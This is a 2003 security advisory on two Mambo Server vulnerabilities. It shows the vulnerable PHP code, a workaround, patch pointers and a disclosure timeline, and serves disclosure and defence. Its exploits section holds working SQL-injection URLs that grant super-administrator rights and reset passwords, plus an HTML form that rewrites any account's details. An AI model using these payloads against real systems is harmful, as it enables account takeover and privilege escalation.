[SCSA-023] Multiple vulnerabilities in Mambo Server
======================================================================
Security Corporation Security Advisory [SCSA-023]
Multiple vulnerabilities in Mambo Server
======================================================================
PROGRAM: Mambo Server
HOMEPAGE: http://www.mamboserver.com
VULNERABLE VERSIONS: 4.0.14 and 4.5 Beta 1.0.3
RISK: Low/MEDIUM
IMPACT: Redefining of configuration variables
Change of members's and administrator's informations
RELEASE DATE: 2003-12-10
======================================================================
TABLE OF CONTENTS
======================================================================
1..........................................................DESCRIPTION
2..............................................................DETAILS
3.............................................................EXPLOITS
4............................................................SOLUTIONS
5...........................................................WORKAROUND
6..................................................DISCLOSURE TIMELINE
7..............................................................CREDITS
8...........................................................DISCLAIMER
9...........................................................REFERENCES
10............................................................FEEDBACK
1. DESCRIPTION
======================================================================
"Mambo Open Source is the finest open source Web Content Management
System available today. Mambo Open Source makes communicating via
the Web easy"
(direct quote from Mambo Server website)
2. DETAILS
======================================================================
Version 4.0.14 :
- Redefining of configuration variables :
A vulnerability has been discovered in the regglobals.php file that
allows unauthorized users to redefine configuration variables.
Vulnerable code :
----------------------------------------------------
<?php
if (!ini_get('register_globals')) {
session_start();
$raw = phpversion();
list($v_Upper,$v_Major,$v_Minor) = explode(".",$raw);
if(($v_Upper > 4 && $v_major < 1) || $v_Upper < 4){
$_FILES = $HTTP_POST_FILES;
$_ENV = $HTTP_ENV_VARS;
$_GET = $HTTP_GET_VARS;
$_POST = $HTTP_POST_VARS;
$_COOKIE = $HTTP_COOKIE_VARS;
$_SERVER = $HTTP_SERVER_VARS;
$_SESSION = $HTTP_SESSION_VARS;
$_FILES = $HTTP_POST_FILES;
}
while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_SESSION)) $GLOBALS[$key]=$value;
foreach($_FILES as $key => $value) {
$GLOBALS[$key]=$_FILES[$key]['tmp_name'];
foreach($value as $ext => $value2) {
$key2 = $key."_".$ext;
$GLOBALS[$key2]=$value2;
}
}
}
?>
----------------------------------------------------
We see at first that if register_globals=OFF, all the variables
FILES, ENV, GET, POST, COOKIE, SERVER and SESSION will be
redefined as global variables (GLOBAL).
Only this code raises no problem of security.
But if the files : banners.php, pollBooth.php, upload.php,
usermenu.php and userpage.php, we can see the following code :
------------------------------
include ("configuration.php");
[...]
include ("regglobals.php");
------------------------------
The configuration.php file contains variables as :
------------------------------------------------------------
$host = 'localhost'; // This is normally set to localhost
$user = ''; // MySQL username
$password = ''; // MySQL password
$db = ''; // MySQL database name
$dbprefix = 'mos_'; // Do not change unless you need to!
------------------------------------------------------------
...
It is then possible to an attacker to give new values to
all the variables of configurations.
For example the pollBooth.php file :
----------------------------------------------------
include("configuration.php");
include('language/'.$lang.'/lang_poll.php');
include("regglobals.php");
[...]
switch ($task){
case "Vote":
addvote($voteID, $cook, $polls, $dbprefix);
break;
[...]
}
function addvote($voteID, $cook, $pollID, $dbprefix){
if ($database==""){
require("classes/database.php");
$database = new database();
}
global $sessioncookie;
if (empty($sessioncookie)) {
print "<SCRIPT>alert(\""._ALERT_ENABLED."\");
window.history.go(-1);</SCRIPT>\n";
} else {
if($cook == "1") {
print "<SCRIPT> alert(\""._ALREADY_VOTE."\");
window.history.go(-1);</SCRIPT>\n";
}
else {
if ($voteID == 0){
print "<SCRIPT>alert(\""._NO_SELECTION."\");
window.history.go(-1);</SCRIPT>\n";
}
$cvalue = "1";
$cookiename="voted".$pollID;
setcookie("$cookiename", $cvalue, time()+87640);
}
if($cook == "") {
if ($voteID > 0) {
$query = "UPDATE ".$dbprefix."poll_data SET optionCount=optionCount + 1
WHERE pollid='$pollID' AND voteid='$voteID'";
$database->openConnectionNoReturn($query);
$voters = $voters + 1;
$query = "UPDATE ".$dbprefix."poll_desc SET voters=voters + 1 WHERE
pollID='$pollID'";
$database->openConnectionNoReturn($query);
$today = date("Y-m-d G:i:s");
$query = "INSERT INTO ".$dbprefix."poll_date SET date='$today',
vote_id='$voteID', poll_id='$pollID'";
$database->openConnectionNoReturn($query);
echo "<SCRIPT> alert(\""._THANKS."\"); window.history.go(-1);</SCRIPT>";
}
}
}
}
[...]
----------------------------------------------------
It is thus possible to execute any request UPDATE via
the pollBooth.php file if register_globals=OFF.
Version 4.5 Beta 1.0.3 :
- Change of members's and administrator's informations :
A vulnerability has been discovered in the components/com_user/user.php
file that allows unauthorized users to change members's and
administrator's informations.
Vulnerable code :
---------------------------------------------------
[...]
switch( $task ) {
[...]
case "saveUserEdit":
userSave( $option, $my->id );
break;
[...]
}
[...]
function userSave( $option, $uid) {
global $database;
if ($uid == 0) {
echo _NOT_AUTH;
return;
}
$row = new mosUser($database);
if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "")) {
$row->load($_POST["id"]);
$row->orig_password = $row->password;
}
if (!$row->bind( $_POST )) {
echo "<script> alert('".$row->getError()."'); window.history.go(-1);
</script>\n";
exit();
}
if(isset($_POST["password"]) && $_POST["password"] != "") {
if(isset($_POST["verifyPass"]) && ($_POST["verifyPass"] ==
$_POST["password"])) {
$row->password = md5($_POST["password"]);
} else {
echo "<script> alert('Passwords do not match'); window.history.go(-1);
</script>\n";
exit();
}
} else {
// Restore 'original password'
$row->password = $row->orig_password;
}
if (!$row->check()) {
echo "<script> alert('".$row->getError()."'); window.history.go(-1);
</script>\n";
exit();
}
unset($row->orig_password); // prevent DB error!!
if (!$row->store()) {
echo "<script> alert('".$row->getError()."'); window.history.go(-1);
</script>\n";
exit();
}
mosRedirect( "index.php?option=$option" );
}
[...]
----------------------------------------------------
It's possible for an attacker to modify many informations about
an account via his ID like password, email, name etc...
3. EXPLOITs
======================================================================
Version 4.0.14 :
- Redefining of configuration variables (if magic_quotes_gpc=OFF):
# The title of the article N°23 becomes "hop" :
http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_articles%20SET%20title=char(104,111,112)
%20WHERE artid=23/*
# The user having id 52 becomes "super administrator" :
http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117,
112,101,114,97,100,109,105,110,105,115,116,114,97,116,111,114)
%20WHERE%20id=52/*
# The password of the user having id 10 becomes 'a' :
http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_users%20SET%20password=md5(char(97))
%20WHERE%20id=10/*
Version 4.5 Beta 1.0.3 :
- Change of members's and administrator's informations :
Here is an example that permit to modify informations
about an ID account :
--------------------exploit.html--------------------
<html>
<head></head>
<body>
<form action="http://[target]/index.php" method="post">
New Name : <inputtype="text" name="name" value=""><br>
New E-mail : <input type="text" name="email" value="" size="30"><br>
New UserName : <input type="text" name="username" value=""><br>
New Password : <input type="password" name="password" value=""><br>
Verfiy New Pass : <input type="password" name="verifyPass"><br>
ID : <input type="text" name="id" value="1"><br>
<input type="hidden" name="option" value="com_user">
<input type="hidden" name="task" value="saveUserEdit">
<input type="submit" name="submit" value="Update"><br>
</form>
</body>
</html>
--------------------exploit.html--------------------
4. SOLUTIONS
======================================================================
You can found patchs at the following link : http://www.phpsecure.info
The creator (Robert Castley) was notified, published a patch 2 for
version 4.0.1 (works only if the patch 1 was installed) and a Beta
1.0.14 version 4.5 was published for the vulnerabilities of 1.0.13.
5. WORKAROUND
======================================================================
Version 4.0.14 :
In banners.php, pollBooth.php, upload.php, usermenu.php and
userpage.php simply add the following line as FIRST LINE,
and delete the other inclusions of this file :
---------------------------
include ("regglobals.php");
---------------------------
Version 4.5 Beta 1.0.3 :
In the components/com_user/user.php file, in the userSave() function,
replace the following lines :
----------------------------------------------------
if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "")) {
$row->load($_POST["id"]);
$row->orig_password = $row->password;
}
----------------------------------------------------
by
----------------------------------------------------
if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "") &&
$_POST["id"] == $uid) {
$row->load($_POST["id"]);
$row->orig_password = $row->password;
}else{
die("Bad User Id");
}
----------------------------------------------------
6. DISCLOSURE TIMELINE
======================================================================
25/11/2003 Vulnerability discovered
25/11/2003 Vendor notified
25/11/2003 Vendor response
25/11/2003 Security Corporation clients notified
28/11/2003 Started e-mail discussions
09/12/2003 Last e-mail received
10/12/2003 Public disclosure
7. CREDITS
======================================================================
frog-m@n <frog-man@xxxxxxxxxxxxxxxxxxxxxxxx> is credited with this discovery
Nicolas DE RYCKE <http://www.knowckers.org> is greeted.
8. DISLAIMER
======================================================================
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
9. REFERENCES
======================================================================
- Original Version:
http://www.security-corporation.com/advisories-023.html
- Version Française:
http://www.security-corporation.com/index.php?id=advisories&a=023-FR
10. FEEDBACK
======================================================================
Please send suggestions, updates, and comments to:
Security Corporation
http://www.security-corporation.com
advisory@xxxxxxxxxxxxxxxxxxxxxxxx